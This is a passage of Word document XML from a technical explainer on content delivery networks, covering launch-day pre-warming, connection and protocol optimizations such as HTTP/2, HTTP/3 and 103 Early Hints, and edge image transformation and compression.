    <w:p w14:paraId="03676770" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1272"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Single files can saturate NIC links during popular releases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F7DA80" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1272"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-warming:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Major releases (Windows Update, game launch day) must be pre-positioned at ALL edges before launch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F863DC9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How game publishers handle launch day:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFD2754" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Days before launch: push full game files to all CDN edges (pre-warming).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DA9D27" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Launch moment: DNS/config change makes content accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CBC0A0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN serves millions of simultaneous downloads from local edge cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9A3B3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin bandwidth: ~0 (everything pre-positioned).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF9E13F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Total distribution: 50 TB+ across millions of clients, served entirely from edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2042F1D9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="3431B4F5">
          <v:rect id="_x0000_i4688" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4344E201" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. CDN Performance Optimizations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449F27D7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 Connection Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C83707" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Each user connecting to the CDN needs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F3CBCE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1274"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>DNS lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADE6385" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1274"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>TCP handshake (1 RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209CBC4F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1274"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>TLS handshake (1–2 RTTs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F0F81E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1274"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTTP request/response (1 RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B7370" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>For a page with 50 resources from 3 domains: without optimization, this is dozens of round trips.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F384FAD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E557E56" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-established connections to origin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC5E98" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1275"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN maintains permanent, warm TCP connections to your origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2125AD49" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1275"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>When a cache miss occurs, the CDN doesn't establish a NEW connection to origin (saves 1-2 RTTs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D75889C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1275"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>These connections are already past TCP slow-start (full bandwidth available immediately).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6106ABC3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 multiplexing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F84D54" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1276"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN serves all resources for a domain over a SINGLE connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBB6229" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1276"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>50 resources × 1 connection (instead of 50 × 6 connections in HTTP/1.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB1A626" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1276"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>No head-of-line blocking at HTTP level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503FBEF8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1276"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Header compression (HPACK) reduces per-request overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388E0EA7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/3 (QUIC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD4FF59" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1277"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>0-RTT connection establishment on revisit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5254DBA3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1277"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>No TCP head-of-line blocking (stream-level independence).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7AE20B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1277"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Connection migration (mobile users switching WiFi/cellular).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313E9411" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1277"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>CDN can offer HTTP/3 to client even if origin only supports HTTP/1.1 (CDN translates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C3225F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS session resumption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010A7A52" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN stores TLS session tickets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A034D2C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Returning users: 0-RTT TLS handshake (data sent in first packet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB438FF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1278"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Shared session ticket keys across all PoP servers (any server in the PoP can resume any session).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFB73D5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Early Hints (HTTP 103):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48975E70" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN can respond with 103 Early Hints BEFORE the full response is ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720EC108" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Tells the browser to start preloading critical resources while waiting for the actual response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1041A6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B34CF3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTTP/1.1 103 Early Hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9C09B3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Link: &lt;/style.css&gt;; rel=preload; as=style</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732D08F1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Link: &lt;/app.js&gt;; rel=preload; as=script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BCFB91" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="6A0BA072" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B172D26" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>[actual page content]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232BEEB0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Content Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67708E48" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Image optimization (on-the-fly):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640F50C6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN can transform images at the edge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9A95FF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577917D9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Original: /photos/sunset.jpg (5 MB, 4000×3000, JPEG)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B94D338" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="7778010E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Serve to mobile: /photos/sunset.jpg?w=400&amp;format=webp&amp;quality=80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CD5DA3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>→ CDN transforms: resize to 400px, convert to WebP, quality 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8E1141" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>→ Result: 35 KB (143x smaller!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B38B8B0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>→ Cached as a separate variant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A121C1F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How this works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD7F1D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Request arrives with transformation parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D928208" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge checks cache for this specific variant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6893488B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>If miss: fetch original, apply transformation (resize, format convert, compress).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7552DBF4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache the transformed result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CD0938" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Subsequent requests for same variant: served from cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E75A47" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Popular CDN image features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007EFA5D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1281"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Format auto-negotiation: detect Accept: image/webp → serve WebP. Detect Accept: image/avif → serve AVIF. Else → JPEG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257677B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1281"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Responsive images: CDN generates appropriate size based on CF-Device-Type or DPR header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E298BCF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1281"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Quality optimization: perceptual quality tuning (reduce quality where human eye can't tell difference).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE53862" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Minification and bundling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B1084A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN can minify HTML/CSS/JS on-the-fly (remove whitespace, comments, shorten variable names).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0097EAB5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Reduces payload size by 20–40%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F13E3EA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1282"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>No build-time changes needed — CDN does it transparently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191B70C3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Brotli/gzip compression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC1A53B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1283"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN compresses responses at the edge (if origin didn't already).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BECB1B5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1283"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Chooses best algorithm based on client support (Brotli preferred, gzip fallback).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026A4E77" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1283"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Pre-compresses popular assets (compress once, serve many times).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4350D950" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Protocol Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FADA0BE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP optimization at the edge:</w:t>
      </w:r>
    </w:p>
